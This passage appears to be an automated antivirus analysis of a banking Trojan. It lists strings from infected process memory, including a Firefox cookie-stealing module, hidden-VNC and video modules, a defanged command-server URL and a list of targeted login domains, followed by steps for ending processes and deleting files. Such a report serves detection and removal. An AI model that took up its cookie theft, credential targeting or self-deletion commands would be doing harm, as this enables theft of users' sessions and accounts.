.timer ON|OFF Turn the CPU timer measurement on or off
Error: unable to open database "%s": %s
Error: cannot open "%s"
Error: %s
PRAGMA foreign_keys=OFF;
SELECT name, type, sql FROM sqlite_master WHERE sql NOT NULL AND type=='table' AND name!='sqlite_sequence'
SELECT name, type, sql FROM sqlite_master WHERE name=='sqlite_sequence'
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view')
SELECT name, type, sql FROM sqlite_master WHERE tbl_name LIKE shellstatic() AND type=='table' AND sql NOT NULL
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view') AND tbl_name LIKE shellstatic()
import
Error: non-null separator required for import
SELECT * FROM %s
INSERT INTO %s VALUES(?
Error: %s line %d: expected %d columns of data but found %d
SELECT name FROM sqlite_master WHERE type='index' AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' ORDER BY 1
SELECT name FROM sqlite_master WHERE type='index' AND tbl_name LIKE shellstatic() UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' AND tbl_name LIKE shellstatic() ORDER BY 1
Error: querying sqlite_master and sqlite_temp_master
Error: invalid arguments: "%s". Enter ".help" for help
Error: cannot open pipe "%s"
Error: cannot write to "%s"
CREATE TABLE sqlite_master (
CREATE TEMP TABLE sqlite_temp_master (
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE lower(tbl_name) LIKE shellstatic() AND type!='meta' AND sql NOTNULL ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE type!='meta' AND sql NOTNULL AND name NOT LIKE 'sqlite_%'ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
%9.9s: %s
SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT 'temp.' || name FROM sqlite_temp_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT '%q.' || name FROM "%w".sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%s%-*s
iskeyword
ambiguous option name: "%s"
Error: invalid testctrl option: %s
%d (0xx)
Error: testctrl %s takes a single int option
Error: testctrl %s takes no options
Error: testctrl %s takes a single unsigned int option
Error: CLI support for testctrl %s not implemented
SQLite %s %s
Error: unknown command or invalid arguments: "%s". Enter ".help" for help
Error: near line %d:
%s %s
Error: incomplete SQL: %s
%s: Error: cannot locate your home directory
%s/.sqliterc
-- Loading resources from %s
Usage: %s [OPTIONS] FILENAME [SQL]
FILENAME is the name of an SQLite database. A new database is created
sqlite>
SQLite header and source version mismatch
no such VFS: "%s"
%s: Error: too many options: "%s"
%s: Error: missing argument for option: %s
Error: unable to process SQL "%s"
%s: Error: unknown option: %s
%s/.sqlite_history
SQLite version %s %.19s
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
zcÁ
%System%\regsvr32.exe
GetCPInfo
]<%XkG
.text
`.rdata
@.data
.reloc
KERNEL32.DLL
ole32.dll
ffcookieextractor.dll
_getFirefoxCookie
mscoree.dll
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
888816666554443
6666554443
!6666554443
%AppData%\Mozilla\Firefox
\profiles.ini
\cookies.sqlite
Kernel32.dll

regsvr32.exe_3384_rwx_01000000_00005000:

.text
`.data
.rsrc
msvcrt.dll
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
ole32.dll
regsvr32.pdb
_wcmdln
RegCloseKey
RegOpenKeyExW
Excessive # of DLL's on cmdline
5.1.2600.5512 (xpsp.080413-2105)
REGSVR32.EXE
Windows
Operating System
5.1.2600.5512
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
OleUninitialize failed.["%1" is not an executable file and no registration

new.exe_3664_rwx_00130000_00047000:

.text
`.data
.reloc
update.exe
config.bin
%0&!%F
?)500>(8
7-52&<&,
,%)4.5(";$2
:'$!71689/
-0=).?,7
60/)4:5<
-*?)2<3:
>5;(4-2>)4 }744
"?5&"5%3%/
398>7="'
;!)5:. =##
Z#%xDVOE
(00(7> <$>59<&=3 =
$6>59$=1
^EXKSQN_^%X Sf
PR_OpenTCPSocket
%s%s%s
gdiplus.dll
GdiplusShutdown
ole32.dll
gdi32.dll
value=[%s], code=[%s]
HTTP/1.1
HTTP/1.0
hXXps://
GET /favicon.ico HTTP/1.1
HTTP/1.
X-WebKit-CSP
hXXp://VVV.google.com/webhp
%COMMANDSERVER%
hXXp://127.0.0.1:%u/
X-Type: %s
_getFirefoxCookie
hXXp://
atmos_hvnc.module
atmos_ffcookie.module
atmos_video.module
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)
urlmon.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s, u %s %u u:u:u GMT
; charset=%s
HTTP/1.1 %u %s
Date: %s
Content-Length: %u
Expires: %s
Content-Type: %s%s
ID: %s
value_%s
value_%s_%s
%s = "%s";
*.facebook.com
*.twitter.com
*.instagram.com
*.booking.com
*.sharepoint.com
*.yahoo.com
login.yahoo.com
*.google.com
accounts.google.com
192.168.*.*
127.0.0.1
*/wp-login.php*
*.xn--p1ai
Cookie: %s
Referer: %s
Accept: %s
Accept-Language: %s
Accept-Encoding: %s
SSSh8
9.tI3
CreatePipe
GetWindowsDirectoryW
GetProcessHeap
KERNEL32.dll
GetKeyboardState
MsgWaitForMultipleObjects
ExitWindowsEx
USER32.dll
RegCreateKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
SHDeleteKeyW
PathIsURLW
SHLWAPI.dll
ShellExecuteW
ShellExecuteExW
SHELL32.dll
Secur32.dll
GDI32.dll
WS2_32.dll
PFXImportCertStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpSendRequestA
HttpEndRequestW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
InternetCrackUrlA
InternetCrackUrlW
WININET.dll
OLEAUT32.dll
NETAPI32.dll
VERSION.dll
NtQueryKey
ntdll.dll
PSSSSSSh
SSSh4
SUWt^Ht[Ht.Huc
2!242:2?2[2
Chrome
Firefox
nnspr4.dll
nss3.dll
chrome.dll
Process (u minute): %s
Input: %s
X-TS-Rule-Name: %s
X-TS-Rule-PatternID: %u
X-TS-BotID: %s
X-TS-Domain: %s
X-TS-SessionID: %s
Content-Type: application/x-www-form-urlencoded
X-TS-Header-Cookie: %S
X-TS-Header-Referer: %S
X-TS-Header-AcceptEncoding: %S
X-TS-Header-AcceptLanguage: %S
X-TS-Header-UserAgent: %S
kernel32.dll
Global\XXX
Company: %s
Product: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
%sd1%
%sd2%
Name: %s
Path: %s
Hash: %s
Time: u.u.u
\StringFileInfo\xx\%s
"%s" %s
/c "%s"
%sx.%s
%sx
SELECT * FROM %s
Rapport
sXXXX
d*.swf
*.flv
*.png
*.jpg
*.ico
*.gif
*.css
%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia
%Documents and Settings%\%current user%\Application Data\Uccyemuzput
odobdima.xia
:\Documents and Settings\"%CurrentUserName%"\Application Data\Felaytzyymes\zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data\Felaytzyymes
zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data

new.exe_3664_rwx_00400000_0000F000:

.text
`.rdata
@.data
a%FnQU
GetProcessHeap
KERNEL32.dll
EnumChildWindows
EnumWindows
USER32.dll
\d.nC
v1%ULRg
]j'
)%uj>_
.io*U
dxKeY
ntdll.dll
setup.dat

Explorer.EXE_1572_rwx_01EA0000_00047000:

.text
`.data
.reloc
update.exe
config.bin
%0&!%F
?)500>(8
7-52&<&,
,%)4.5(";$2
:'$!71689/
-0=).?,7
60/)4:5<
-*?)2<3:
>5;(4-2>)4 }744
"?5&"5%3%/
398>7="'
;!)5:. =##
Z#%xDVOE
(00(7> <$>59<&=3 =
$6>59$=1
^EXKSQN_^%X Sf
PR_OpenTCPSocket
%s%s%s
gdiplus.dll
GdiplusShutdown
ole32.dll
gdi32.dll
value=[%s], code=[%s]
HTTP/1.1
HTTP/1.0
hXXps://
GET /favicon.ico HTTP/1.1
HTTP/1.
X-WebKit-CSP
hXXp://VVV.google.com/webhp
%COMMANDSERVER%
hXXp://127.0.0.1:%u/
X-Type: %s
_getFirefoxCookie
hXXp://
atmos_hvnc.module
atmos_ffcookie.module
atmos_video.module
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)
urlmon.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s, u %s %u u:u:u GMT
; charset=%s
HTTP/1.1 %u %s
Date: %s
Content-Length: %u
Expires: %s
Content-Type: %s%s
ID: %s
value_%s
value_%s_%s
%s = "%s";
*.facebook.com
*.twitter.com
*.instagram.com
*.booking.com
*.sharepoint.com
*.yahoo.com
login.yahoo.com
*.google.com
accounts.google.com
192.168.*.*
127.0.0.1
*/wp-login.php*
*.xn--p1ai
Cookie: %s
Referer: %s
Accept: %s
Accept-Language: %s
Accept-Encoding: %s
SSSh8
9.tI3
CreatePipe
GetWindowsDirectoryW
GetProcessHeap
KERNEL32.dll
GetKeyboardState
MsgWaitForMultipleObjects
ExitWindowsEx
USER32.dll
RegCreateKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
SHDeleteKeyW
PathIsURLW
SHLWAPI.dll
ShellExecuteW
ShellExecuteExW
SHELL32.dll
Secur32.dll
GDI32.dll
WS2_32.dll
PFXImportCertStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpSendRequestA
HttpEndRequestW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
InternetCrackUrlA
InternetCrackUrlW
WININET.dll
OLEAUT32.dll
NETAPI32.dll
VERSION.dll
NtQueryKey
ntdll.dll
PSSSSSSh
SSSh4
SUWt^Ht[Ht.Huc
2!242:2?2[2
Chrome
Firefox
nnspr4.dll
nss3.dll
chrome.dll
Process (u minute): %s
Input: %s
X-TS-Rule-Name: %s
X-TS-Rule-PatternID: %u
X-TS-BotID: %s
X-TS-Domain: %s
X-TS-SessionID: %s
Content-Type: application/x-www-form-urlencoded
X-TS-Header-Cookie: %S
X-TS-Header-Referer: %S
X-TS-Header-AcceptEncoding: %S
X-TS-Header-AcceptLanguage: %S
X-TS-Header-UserAgent: %S
kernel32.dll
Global\XXX
Company: %s
Product: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
%sd1%
%sd2%
Name: %s
Path: %s
Hash: %s
Time: u.u.u
\StringFileInfo\xx\%s
"%s" %s
/c "%s"
%sx.%s
%sx
SELECT * FROM %s
Rapport
sXXXX
d*.swf
*.flv
*.png
*.jpg
*.ico
*.gif
*.css
%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia
%Documents and Settings%\%current user%\Application Data\Uccyemuzput
odobdima.xia
%Documents and Settings%\%current user%\Application Data\Felaytzyymes\zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data\Felaytzyymes
zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1480
    mofcomp.exe:3476
    WindowsXP-KB968930-x86-ENG.exe:3964
    new.exe:3064
    net1.exe:2460
    tasklist.exe:2264
    ngen.exe:3596
    ngen.exe:3168
    ngen.exe:3676
    ngen.exe:3300
    ngen.exe:856
    ngen.exe:2988
    ngen.exe:3172
    ngen.exe:1960
    ngen.exe:1944
    ngen.exe:420
    ngen.exe:916
    ngen.exe:3936
    ngen.exe:3996
    ngen.exe:1868
    ngen.exe:2188
    ngen.exe:2952
    ngen.exe:3560
    ngen.exe:3224
    ngen.exe:1724
    ngen.exe:3220
    ngen.exe:1976
    ngen.exe:2164
    ngen.exe:648
    update.exe:4040
    net.exe:2156
    net.exe:2224
    net.exe:2416
    hostname.exe:1384
    PSCustomSetupUtil.exe:620
    PSCustomSetupUtil.exe:452
    PSCustomSetupUtil.exe:3908
    PSCustomSetupUtil.exe:1924
    PSCustomSetupUtil.exe:2196
    PSCustomSetupUtil.exe:3064
    PSCustomSetupUtil.exe:2308
    PSCustomSetupUtil.exe:2224
    PSCustomSetupUtil.exe:3696
    PSCustomSetupUtil.exe:3856
    PSCustomSetupUtil.exe:2176
    PSCustomSetupUtil.exe:2244
    PSCustomSetupUtil.exe:2112
    PSCustomSetupUtil.exe:2240
    PSCustomSetupUtil.exe:3992
    PSCustomSetupUtil.exe:2288
    PSCustomSetupUtil.exe:2344
    PSCustomSetupUtil.exe:3952
    PSCustomSetupUtil.exe:2552
    PSCustomSetupUtil.exe:1496
    PSCustomSetupUtil.exe:264
    PSCustomSetupUtil.exe:1868
    PSCustomSetupUtil.exe:1284
    PSCustomSetupUtil.exe:2332
    PSCustomSetupUtil.exe:2556
    PSCustomSetupUtil.exe:2140
    ipconfig.exe:1240
    yfenaromaf.exe:1664
    PSSetupNativeUtils.exe:1932
    mscorsvw.exe:4008
    mscorsvw.exe:3128
    mscorsvw.exe:2592
    mscorsvw.exe:2732
    mscorsvw.exe:3104
    mscorsvw.exe:2284
    mscorsvw.exe:3484
    mscorsvw.exe:2168
    mscorsvw.exe:2072
    mscorsvw.exe:3084
    mscorsvw.exe:2408
    mscorsvw.exe:828
    regsvr32.exe:3404
    regsvr32.exe:3200
    wsmanhttpconfig.exe:3232
    wsmanhttpconfig.exe:1960
    netsh.exe:2304
    bindata865.exe:3088

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Application Data\Olifiqtu\yfenaromaf.exe (269 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmp1.tmp (4545 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmp2.tmp (7385 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmpfa60f4ad.bat (177 bytes)
    %System%\wbem\Logs\mofcomp.log (1814 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmpD4.tmp (1 bytes)
    C:\ea4acb66495575d6b9f323\powershell_ise.exe (2526 bytes)
    C:\ea4acb66495575d6b9f323\about_transactions.help.txt (1011 bytes)
    C:\ea4acb66495575d6b9f323\about_format.ps1xml.help.txt (17 bytes)
    C:\ea4acb66495575d6b9f323\wsmplpxy.dll (603 bytes)
    C:\ea4acb66495575d6b9f323\windowsremoteshell.adm (12 bytes)
    C:\ea4acb66495575d6b9f323\pscustomsetuputil.exe (316 bytes)
    C:\ea4acb66495575d6b9f323\about_jobs.help.txt (12 bytes)
    C:\ea4acb66495575d6b9f323\$shtdwn$.req (788 bytes)
    C:\ea4acb66495575d6b9f323\powershell.exe (7339 bytes)
    C:\ea4acb66495575d6b9f323\update\updspapi.dll (5940 bytes)
    C:\ea4acb66495575d6b9f323\about_command_syntax.help.txt (5 bytes)
    C:\ea4acb66495575d6b9f323\about_bits_cmdlets.help.txt (7 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll (998 bytes)
    C:\ea4acb66495575d6b9f323\importallmodules.psd1 (438 bytes)
    C:\ea4acb66495575d6b9f323\about_functions_advanced.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\winrm.vbs (2727 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
    C:\ea4acb66495575d6b9f323\update\update.exe (10748 bytes)
    C:\ea4acb66495575d6b9f323\about_job_details.help.txt (824 bytes)
    C:\ea4acb66495575d6b9f323\bitstransfer.psd1 (950 bytes)
    C:\ea4acb66495575d6b9f323\about_locations.help.txt (794 bytes)
    C:\ea4acb66495575d6b9f323\about_comparison_operators.help.txt (11 bytes)
    C:\ea4acb66495575d6b9f323\wsmauto.dll (1842 bytes)
    C:\ea4acb66495575d6b9f323\about_return.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\spuninst.exe (3787 bytes)
    C:\ea4acb66495575d6b9f323\about_remote.help.txt (7 bytes)
    C:\ea4acb66495575d6b9f323\wevtfwd.dll (3351 bytes)
    C:\ea4acb66495575d6b9f323\about_wmi_cmdlets.help.txt (8 bytes)
    C:\ea4acb66495575d6b9f323\system.management.automation.dll-help.xml (16567 bytes)
    C:\ea4acb66495575d6b9f323\about_functions_advanced_parameters.help.txt (962 bytes)
    C:\ea4acb66495575d6b9f323\about_arrays.help.txt (8 bytes)
    C:\ea4acb66495575d6b9f323\about_trap.help.txt (10 bytes)
    C:\ea4acb66495575d6b9f323\about_pssession_details.help.txt (9 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
    C:\ea4acb66495575d6b9f323\about_break.help.txt (792 bytes)
    C:\ea4acb66495575d6b9f323\registry.format.ps1xml (20 bytes)
    C:\ea4acb66495575d6b9f323\spmsg.dll (495 bytes)
    C:\ea4acb66495575d6b9f323\filesystem.format.ps1xml (133 bytes)
    C:\ea4acb66495575d6b9f323\diagnostics.format.ps1xml (590 bytes)
    C:\ea4acb66495575d6b9f323\about_redirection.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
    C:\ea4acb66495575d6b9f323\about_aliases.help.txt (6 bytes)
    C:\ea4acb66495575d6b9f323\about_operators.help.txt (770 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
    C:\ea4acb66495575d6b9f323\about_throw.help.txt (5 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.dll (9738 bytes)
    C:\ea4acb66495575d6b9f323\about_debuggers.help.txt (21 bytes)
    C:\ea4acb66495575d6b9f323\wsmwmipl.dll (2816 bytes)
    C:\ea4acb66495575d6b9f323\about_windows_powershell_2.0.help.txt (453 bytes)
    C:\ea4acb66495575d6b9f323\wsmtxt.xsl (2 bytes)
    C:\ea4acb66495575d6b9f323\winrm.cmd (35 bytes)
    C:\ea4acb66495575d6b9f323\about_split.help.txt (10 bytes)
    C:\ea4acb66495575d6b9f323\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.resources.dll (508 bytes)
    C:\ea4acb66495575d6b9f323\about_history.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.wsman.management.resources.dll (13 bytes)
    C:\ea4acb66495575d6b9f323\about_regular_expressions.help.txt (5 bytes)
    C:\ea4acb66495575d6b9f323\wsman.format.ps1xml (837 bytes)
    C:\ea4acb66495575d6b9f323\about_properties.help.txt (7 bytes)
    C:\ea4acb66495575d6b9f323\pwrshplugin.dll (802 bytes)
    C:\ea4acb66495575d6b9f323\powershelltrace.format.ps1xml (344 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.resources.dll (508 bytes)
    C:\ea4acb66495575d6b9f323\about_types.ps1xml.help.txt (481 bytes)
    C:\ea4acb66495575d6b9f323\about_signing.help.txt (12 bytes)
    C:\ea4acb66495575d6b9f323\about_do.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\winrm.ini (1956 bytes)
    C:\ea4acb66495575d6b9f323\about_script_internationalization.help.txt (9 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll-help.xml (8740 bytes)
    C:\ea4acb66495575d6b9f323\help.format.ps1xml (3947 bytes)
    C:\$Directory (800 bytes)
    C:\ea4acb66495575d6b9f323\about_windows_powershell_ise.help.txt (6 bytes)
    C:\ea4acb66495575d6b9f323\about_arithmetic_operators.help.txt (168 bytes)
    C:\ea4acb66495575d6b9f323\about_escape_characters.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.dll (14450 bytes)
    C:\ea4acb66495575d6b9f323\winrshost.exe (22 bytes)
    C:\ea4acb66495575d6b9f323\about_remote_output.help.txt (887 bytes)
    C:\ea4acb66495575d6b9f323\about_pipelines.help.txt (411 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
    C:\ea4acb66495575d6b9f323\about_remote_jobs.help.txt (13 bytes)
    C:\ea4acb66495575d6b9f323\winrsmgr.dll (2 bytes)
    C:\ea4acb66495575d6b9f323\wsmprovhost.exe (657 bytes)
    C:\ea4acb66495575d6b9f323\about_functions_cmdletbindingattribute.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.dll (4408 bytes)
    C:\ea4acb66495575d6b9f323\about_assignment_operators.help.txt (379 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.resources.dll (408 bytes)
    C:\ea4acb66495575d6b9f323\windowspowershellhelp.chm (26041 bytes)
    C:\ea4acb66495575d6b9f323\about_functions.help.txt (586 bytes)
    C:\ea4acb66495575d6b9f323\about_providers.help.txt (59 bytes)
    C:\ea4acb66495575d6b9f323\wsmsvc.dll (15909 bytes)
    C:\ea4acb66495575d6b9f323\about_type_operators.help.txt (5 bytes)
    C:\ea4acb66495575d6b9f323\about_preference_variables.help.txt (37 bytes)
    C:\ea4acb66495575d6b9f323\about_eventlogs.help.txt (5 bytes)
    C:\ea4acb66495575d6b9f323\about_commonparameters.help.txt (12 bytes)
    C:\ea4acb66495575d6b9f323\certificate.format.ps1xml (155 bytes)
    C:\ea4acb66495575d6b9f323\about_comment_based_help.help.txt (595 bytes)
    C:\ea4acb66495575d6b9f323\about_command_precedence.help.txt (8 bytes)
    C:\ea4acb66495575d6b9f323\about_profiles.help.txt (457 bytes)
    C:\ea4acb66495575d6b9f323\bitstransfer.format.ps1xml (16 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll (1145 bytes)
    C:\ea4acb66495575d6b9f323\powershell.exe.mui (10 bytes)
    C:\ea4acb66495575d6b9f323\about_for.help.txt (146 bytes)
    C:\ea4acb66495575d6b9f323\winrs.exe (1154 bytes)
    C:\ea4acb66495575d6b9f323\about_prompts.help.txt (7 bytes)
    C:\ea4acb66495575d6b9f323\winrssrv.dll (12 bytes)
    C:\ea4acb66495575d6b9f323\about_remote_troubleshooting.help.txt (146 bytes)
    C:\ea4acb66495575d6b9f323\pwrshsip.dll (24 bytes)
    C:\ea4acb66495575d6b9f323\about_try_catch_finally.help.txt (7 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll (3386 bytes)
    C:\ea4acb66495575d6b9f323\about_parsing.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\about_automatic_variables.help.txt (14 bytes)
    C:\ea4acb66495575d6b9f323\update\spcustom.dll (23 bytes)
    C:\ea4acb66495575d6b9f323\about_pssnapins.help.txt (6 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
    C:\ea4acb66495575d6b9f323\about_objects.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\about_quoting_rules.help.txt (659 bytes)
    C:\ea4acb66495575d6b9f323\wsmres.dll (6164 bytes)
    C:\ea4acb66495575d6b9f323\about_remote_requirements.help.txt (6 bytes)
    C:\ea4acb66495575d6b9f323\about_switch.help.txt (489 bytes)
    C:\ea4acb66495575d6b9f323\about_methods.help.txt (6 bytes)
    C:\ea4acb66495575d6b9f323\wsmpty.xsl (1 bytes)
    C:\ea4acb66495575d6b9f323\about_language_keywords.help.txt (11 bytes)
    C:\ea4acb66495575d6b9f323\update\eula.txt (586 bytes)
    C:\ea4acb66495575d6b9f323\about_ws-management_cmdlets.help.txt (405 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.resources.dll (562 bytes)
    C:\ea4acb66495575d6b9f323\default.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\getevent.types.ps1xml (15 bytes)
    C:\ea4acb66495575d6b9f323\about_continue.help.txt (1 bytes)
    C:\ea4acb66495575d6b9f323\about_logical_operators.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.wsman.runtime.dll (33 bytes)
    C:\ea4acb66495575d6b9f323\profile.ps1 (772 bytes)
    C:\ea4acb66495575d6b9f323\about_script_blocks.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll-help.xml (1797 bytes)
    C:\ea4acb66495575d6b9f323\spupdsvc.exe (287 bytes)
    C:\ea4acb66495575d6b9f323\about_session_configurations.help.txt (276 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.resources.dll (778 bytes)
    C:\ea4acb66495575d6b9f323\about_scripts.help.txt (12 bytes)
    C:\ea4acb66495575d6b9f323\eventforwarding.adm (2 bytes)
    C:\ea4acb66495575d6b9f323\about_foreach.help.txt (10 bytes)
    C:\ea4acb66495575d6b9f323\about_execution_policies.help.txt (13 bytes)
    C:\ea4acb66495575d6b9f323\powershellcore.format.ps1xml (1492 bytes)
    C:\ea4acb66495575d6b9f323\winrmprov.dll (591 bytes)
    C:\ea4acb66495575d6b9f323\dotnettypes.format.ps1xml (266 bytes)
    C:\ea4acb66495575d6b9f323\about_join.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\about_ref.help.txt (1 bytes)
    C:\ea4acb66495575d6b9f323\winrscmd.dll (2907 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
    C:\ea4acb66495575d6b9f323\about_special_characters.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\types.ps1xml (2510 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
    C:\ea4acb66495575d6b9f323\about_while.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\windowsremotemanagement.adm (574 bytes)
    C:\ea4acb66495575d6b9f323\about_hash_tables.help.txt (6 bytes)
    C:\ea4acb66495575d6b9f323\about_wildcards.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\about_reserved_words.help.txt (1 bytes)
    C:\ea4acb66495575d6b9f323\wsmanhttpconfig.exe (3009 bytes)
    C:\ea4acb66495575d6b9f323\update\update.inf (2457 bytes)
    C:\ea4acb66495575d6b9f323\system.management.automation.resources.dll (3153 bytes)
    C:\ea4acb66495575d6b9f323\pssetupnativeutils.exe (9 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.security.resources.dll (9 bytes)
    C:\ea4acb66495575d6b9f323\powershell_ise.resources.dll (4 bytes)
    C:\ea4acb66495575d6b9f323\about_functions_advanced_methods.help.txt (9 bytes)
    C:\ea4acb66495575d6b9f323\wtrinstaller.ico (4803 bytes)
    C:\ea4acb66495575d6b9f323\about_environment_variables.help.txt (417 bytes)
    C:\ea4acb66495575d6b9f323\update\kb968930xp.cat (512 bytes)
    C:\ea4acb66495575d6b9f323\about_remote_faq.help.txt (775 bytes)
    C:\ea4acb66495575d6b9f323\about_variables.help.txt (6 bytes)
    C:\ea4acb66495575d6b9f323\update\update.ver (14 bytes)
    C:\ea4acb66495575d6b9f323\about_data_sections.help.txt (5 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
    C:\ea4acb66495575d6b9f323\winrmprov.mof (789 bytes)
    C:\ea4acb66495575d6b9f323\about_requires.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\wsmauto.mof (4 bytes)
    C:\ea4acb66495575d6b9f323\about_line_editing.help.txt (1 bytes)
    C:\ea4acb66495575d6b9f323\about_core_commands.help.txt (221 bytes)
    C:\ea4acb66495575d6b9f323\about_path_syntax.help.txt (5 bytes)
    C:\ea4acb66495575d6b9f323\about_scopes.help.txt (76 bytes)
    C:\ea4acb66495575d6b9f323\pspluginwkr.dll (1756 bytes)
